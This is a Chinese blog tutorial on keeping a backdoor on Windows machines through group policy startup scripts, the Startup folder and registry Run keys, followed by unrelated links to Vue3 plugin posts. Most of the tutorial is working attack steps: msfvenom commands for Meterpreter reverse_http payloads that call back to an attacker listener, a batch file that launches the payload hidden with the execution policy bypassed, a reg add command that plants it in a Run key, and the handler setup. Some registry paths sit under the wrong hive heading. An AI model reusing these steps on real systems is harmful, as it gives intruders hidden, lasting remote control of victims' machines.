操作系统权限维持(三)之Windows系统-启动项维持后门

最新推荐文章于 2025-04-10 00:20:34 发布
最新推荐文章于 2025-04-10 00:20:34 发布
阅读量1.5k 收藏 7
点赞数 3
分类专栏: 操作系统权限维持 文章标签: windows 网络安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/129775496
版权
系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门

启动项维持后门

启动项

启动项,操作系统在启动的时候,自动加载了很多程序。会在前台或者后台运行,进程表中出现了很多的进程。也许有病毒或木马在自启动行列。

添加启动项的方式:
1、组策略
2、启动文件夹
3、注册表

组策略

可以通过利用组策略开机启动脚本

1、在运行框中输入 “gpedit.msc ”,打开组策略

在这里插入图片描述

2、在【计算机配置】->【在Windows设置】->【脚本(启动/关机)】双击【启动】就可以进行设置

在这里插入图片描述

选择在这里要添加的脚本,当Windows机器系统每次重启之后,就会去运行在这里的脚本文件

3、选择要添加的脚本或者PowerShell

机器名IP
Kali192.168.52.130
Win10192.168.52.131

用msf生成一个powershell的木马

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f psh -o shell.ps1

在这里插入图片描述

上传木马文件到目标机器上

创建一个1.bat脚本,并且添加到组策略【脚本】中

在这里插入图片描述

bat脚本内容如下:

@echo off
powershell.exe ­-w hidden ­-ExecutionPolicy Bypass ­-NoExit ­-File C:\Users\Administart\Desktop\shell.ps1
exit

kali运行msf进行监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run

在这里插入图片描述

重启Win10机器,win10机器上线

在这里插入图片描述

启动文件夹

启动文件夹 里面的文件可以会在开机的时候自动启动。通过开始菜单——所有程序——启动 这个文件夹内,可以将程序开机自动启动

启动文件夹:

C: \ProgramData\Microsoft\Windows\Start Menu\Programs\Startup #系统级,需要system权限
C: \Users\用户名\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup #用户级普通权限

组策略脚本启动文件夹:

C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup
C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown
C:\Windows\System32\GroupPolicy\User\Scripts\Logon
C:\Windows\System32\GroupPolicy\User\Scripts\Logoff

生成木马文件

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f exe -o shell.exe

在这里插入图片描述

我们将我们要运行的恶意脚本上传到目标服务器上的启动项文件夹下

在这里插入图片描述

kali机器开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run

在这里插入图片描述

Win10机器重启,靶机上线

在这里插入图片描述

注册表

注册表(Registry,繁体中文版Windows操作系统称之为登录档)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息

打开注册表

win+r输入regedit

在这里插入图片描述

以下的注册表路径都是注册表的启动项

# HKEY_LOCAL_MACHINE类
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
# HKEY_CURRENT_USER类
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

我们拿其中一个做为列子

在这里插入图片描述

msf生成木马文件

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f exe -o shell.exe

在这里插入图片描述
将木马文件上传至目标服务器

使用reg add 命令进行添加

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Users\Administart\Desktop\shell.exe"

在这里插入图片描述
kali机器开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run

在这里插入图片描述

重启Win10机器,靶机上线

在这里插入图片描述

VUE3 插件开发和使用
m0_49515138的博客
02-07 6181
传统的 Webpack 可以用来构建 npm 包文件,但按照目前更主流的技术选项,编译结果更干净更迷的当属 Rollup ,但 Rollup 需要配置很多插件功能,这对于刚接触包开发开发者来说学习成本比较高,而 Vite 的出现则解决了这个难题,因为 Vite 的底层是基于 Rollup 来完成构建,上层则简化了很多配置上的问题,因此接下来将使用 Vite 来带领开发者入门 npm 包的开发。的新声明 (.d.ts) 文件 ts(7016)
vued3一个D3Vuejs插件
08-10
vue-d3:一个D3Vue.js插件
针对 Vue3 + Element Plus + Vue Router + Pinia + TypeScript 开发环境,在 VS Code 中推荐的实用插件及详细说明
最新发布
爱的叹息的专栏
04-10 1028
针对 Vue3 + Element Plus + Vue Router + Pinia + TypeScript 开发环境,在 VS Code 中推荐的实用插件及详细说明
Vue3使用触摸滑动插件(Swiper)
Vue Amazing UI(Vue3 + TypeScript + Vite)组件库唯一开发维护者
04-17 6558
基于swiper插件封装的轮播图组件,支持:banner轮播图模式;走马灯模式;信息展播模式;并可选择各种切换效果;自定义主题色等;总之,功能丰富,简单易用😁😁
七个超级实用的 Vue 3 插件和库
Jack, what else can you do besides holding your little darling?
04-12 2412
总而言之,Vue 3 是一个强大的 JavaScript 框架,我们能够创建令人难以置信的用户界面和应用程序。借助本文中提到的插件和库,我们可以简化工作流程并在更短的时间获得更佳的结果。
Vue3项目必备插件
weixin_60053942的博客
12-11 3734
为了获得对自动导入组件的TypeScript支持,Vue 3有一个PR扩展了全局组件的接口。目前,Volar已经支持这种用法。如果您使用的是Volar,您可以如下更改配置以获得支持。vue3 中另外一种name定义方式,直接写在script标签上。可以去antfu大佬的插件链接查看更多的配置。列举了一些 Vue 3项目中比较好用的插件。二、配置 vite.config.ts中。Vue3 中写调试代码需要name。[[Pinia#持久化]]Pinia持久化插件
vue3项目中的常用插件
唯有代码让我痴狂
11-13 1128
【代码】vue3项目中的常用插件
VSCode开发 Vue3 建议必备的插件
热门推荐
程序研博客
11-28 3万+
在使用 Visual Studio Code (VSCode) 开发 Vue 3 项目时,有一些插件可以提高开发效率、代码质量和工作流程。
Vue 3 插件推荐与使用
DevCorner的Pro技术博客
05-31 1702
在本篇博客中,我将介绍一些实用的 Vue 3 插件,并结合示例代码进行讲解。这些插件可以帮助你提高开发效率和构建更强大的应用程序。
vue3 的高频插件
weixin_44719499的博客
10-18 1195
Vue 3插件生态非常丰富,涵盖了状态管理、表单验证、国际化、UI 组件库、动画库等方面。选择合适的插件可以大幅提升开发效率,同时优化代码结构和可维护性。
vue3浏览器调试插件
04-27
vue3浏览器调试插件
vscode 开发vue常用插件
06-05
在使用Visual Studio Code (VSCode) 进行Vue.js开发时,有一些必备的插件能够极大地提高开发效率和代码质量。以下将详细讲解这些插件的功能及其重要性: 1. **jonnyyu.chrome-app-devtools-1.1.1.vsix**:这是一个...
vs-code里面 vue代码提示插件
03-14
在本文中,我们将深入探讨两款针对 Vue.js 的 VS-Code 插件——Vue 2 Snippets 和 VueHelper,以及它们如何帮助开发者提升开发效率。 首先,让我们了解 Vue 2 Snippets。这款插件是由 Hridoy 提供的,专门针对 Vue ...
第7章 Vue.js常用插件1
08-08
在本章中,我们将深入探讨Vue.js生态中的常用插件,这些插件极大地扩展了Vue.js的功能,使得开发者能够更高效、便捷地构建复杂的前端应用。Vue.js作为一个轻量级的JavaScript框架,其核心库专注于视图层,而丰富的...
集成了各类插件Vue3模板框架
04-07
集成各类插件Vue3模板框架,旨在帮助开发者快速搭建项目,避免重复劳动,提高开发效率。 首先,Vue3引入了Composition API,这是一种新的组织组件逻辑的方式。相比于Vue2中的Option API,Composition API允许将...
vs code中vue常用插件
rgrgrwfe的博客
12-13 3580
以上插件大多数都可以通过VS Code的扩展商店进行安装,并且都有详细的安装和使用说明。为了保持插件的更新和最佳性能,建议定期检查并更新已安装的插件。同时,随着技术的发展和Vue生态的变化,新的插件可能会不断出现,因此建议定期关注VS Code插件市场的动态,以便获取最新的工具和功能。
vue3插件
weixin_43641912的博客
10-12 1443
插件plugins是一种能为vue添加全局功能的代码,官网连接:https://cn.vuejs.org/guide/reusability/plugins.html。
vscode开发vue3常用插件
02-19
### VSCode Vue3 开发常用插件推荐 #### 编辑增强类插件 为了提高编辑效率,一些插件提供了诸如自动补全、语法高亮等功能。例如 `Auto Rename Tag` 插件能够在修改HTML/XML标签时同步更新其闭合标签[^2]。 #### 主题与界面优化 对于视觉体验有需求的开发者来说,可以选择像 `Atom One Light Theme` 或者 `Cobalt2 Theme Official` 这样的主题来美化工作环境[^1]。另外还有 `VSCode Great Icons` 提供更美观的图标支持[^1]。 #### 中文语言包 为了让国内用户更好地理解和操作VSCode,安装 `Chinese (Simplified) (简体中文) Language Pack for Visual Studio Code` 是很有必要的,它能够使整个IDE界面汉化。 #### 代码片段加速开发 `Vue VSCode Snippets` 和 `Vue 3 Snippets` 都是非常实用的选择,前者通过预设好的模板让开发者可以迅速构建起基本结构;后者则专注于为最新版本框架定制专属片段集合[^3]。 #### 导航辅助工具 当项目规模逐渐增大之后,利用 `Vue Peek` 实现快速定位组件定义位置变得尤为重要。该功能允许使用者仅需简单点击就能直达目标源码所在之处。 #### 路径处理解决方案 针对模块间相互引用频繁的情况,`Path Intellisense` 的存在无疑大大简化了这一过程——无论是相对还是绝对路径都能得到智能提示。而 `file-jump` 功能同样实现了别名路径下的便捷跳转[^4]。 #### 类型感知能力加强 考虑到TypeScript日益普及的趋势,在编写基于TSX/JSX语法糖封装后的单文件组件(SFCs)时,借助于 `TypeScript Vue Plugin (Volar)` 及 `Vue Language Features (Volar)` 来获得更好的类型推断效果显得尤为关键。 #### 图片资源管理 如果涉及到大量图像素材,则不可错过 `Image preview` ,它可以即时显示图片内容而不必离开当前窗口去寻找原图。 #### 版本控制集成 最后但并非最不重要的是,保持良好的Git实践习惯始终是软件工程领域内不可或缺的一环。因此建议加入 `SVN` 或其他形式的SCM客户端以便随时追踪变更记录并协同作业。 ```json { "editor.codeActionsOnSave": { "source.fixAll.eslint": true, "source.organizeImports": true }, "[vue]": { "editor.defaultFormatter": "Vue.vscode-vue-languageservice" } } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值